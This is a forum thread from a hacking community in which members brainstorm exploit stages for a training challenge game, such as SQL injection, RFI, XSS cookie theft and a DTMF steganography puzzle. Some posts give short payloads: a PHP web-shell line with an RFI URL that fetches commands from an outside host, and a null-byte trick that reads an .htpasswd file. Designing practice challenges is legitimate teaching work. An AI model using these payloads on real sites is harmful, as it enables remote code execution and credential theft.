Welcome to HBH V2 ! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

Exploits


ghost's Avatar
0 0

Brainstorming

Dir guessing Looking in source SQL Injection RFI Cookie poisoning Blind SQL Injection


ghost's Avatar
0 0

Nice idea :)

However, thinking about the coding, some of these will take a lot of code to make (specially things such as SQL injections, of which there are literally thousands of variants), unless we make the actual c++ code vulnerable, which I don't how how we're gonna do :p


ghost's Avatar
0 0

SQL injection will take no coding. Actually have an injection point with the powers given to the user of 'read'. Therefore all injections will work but no damage can be done to the database


ghost's Avatar
0 0

Aren't we coding it in C++/VB?


ghost's Avatar
0 0

Err.. no.

We have two websites which people use. There will be bits which involve C++ but the main game will be online


ghost's Avatar
0 0

Ah right I see :p


ghost's Avatar
0 0

i could do some web hacking and some rooting challenges, ive got a site up with some challs already like the rest of the world and ive already sent cheese some c++ code for a rooting chall. :ninja:


ghost's Avatar
0 0

We are looking for parts of challenges, not complete ones. This will allow use to put together one huge challenge(if you like)….


ghost's Avatar
0 0

i know i believe this c++ is getting integrated into the main c++ file. and yeah id lvoe to do some web design im pretty good at PHP


SySTeM's Avatar
-=[TheOutlaw]=-
0 0

Remote File Inclusion would be kinda easy too, you could check through the file and look for a certain line, e.g system($_GET['cmd']); and if it has that line allow it and then use ?cmd=ls&file=http://site.com/cmd.txt :)


ghost's Avatar
0 0

We'd have to make it so that it allowed any get so system($_GET'$1']) with a regex!!! Good idea though


ghost's Avatar
0 0

or just do a standard pioson-null-ify the ext off eg ?page=admin/.htpasswd%00 instead of ?page=index


ghost's Avatar
0 0

this is just an idea, however what we could do is have somewhere the user could post some XSS. Then there could be an automatic reply to that thread or whatever it is(code in PHP to have it reply). The admin(php code) would reply to the thread and after that the hacker would go to his site where the cookies were posted from the admin recieving the XSS attack, and the hacker gets his cookies and log's in as the admin.


ghost's Avatar
0 0

If I got that right did you mean

Have something which send the cookies to their script


SySTeM's Avatar
-=[TheOutlaw]=-
0 0

mozzer wrote: If I got that right did you mean

Have something which send the cookies to their script

Ah, I made something like that, I might still have it somewhere…


ghost's Avatar
0 0

yes thats what im talking about mozzer :D would be nice if you could find that system


ghost's Avatar
0 0

I have an idea which could be added somehow to the game. We don't know the storyline yet, but maybe it'll fit in. Here's the idea. You get access to a system which records phone calls by date ( or location or who knows what ). You're told to search for a specific location/time file. You download it ( mp3 ) and play it. It should contain a convo where a known person from one company talks to an unknown in rebuses ( stegano ). You need to find out the dialled number with some DTMF voice analyzer. That's all. So the mp3 file should contain the DTMF tones of the dialled number, and a short convo after that.


Mr_Cheese's Avatar
0 1

nice idea. yeah we'll deffo use something like that.


Mr_Cheese's Avatar
0 1

nice idea. yeah we'll deffo use something like that.

i'll get working on the 100% finished storyline and i'll implment some exploits into different stages. then i'll hand control of the project straight over to mozzer.


ghost's Avatar
0 0

wow that would be friggin awesome! people are always talkin about the stegano challenges being a waste(lies!) and this would actually be realistic and it would be a pretty damn good stegano challenge inside of this game :D god this game is gonna be sweet


ghost's Avatar
0 0

i think there should be a part when to do it basically the only way is to read something, cause somethigns people neglect to read, and thats a key element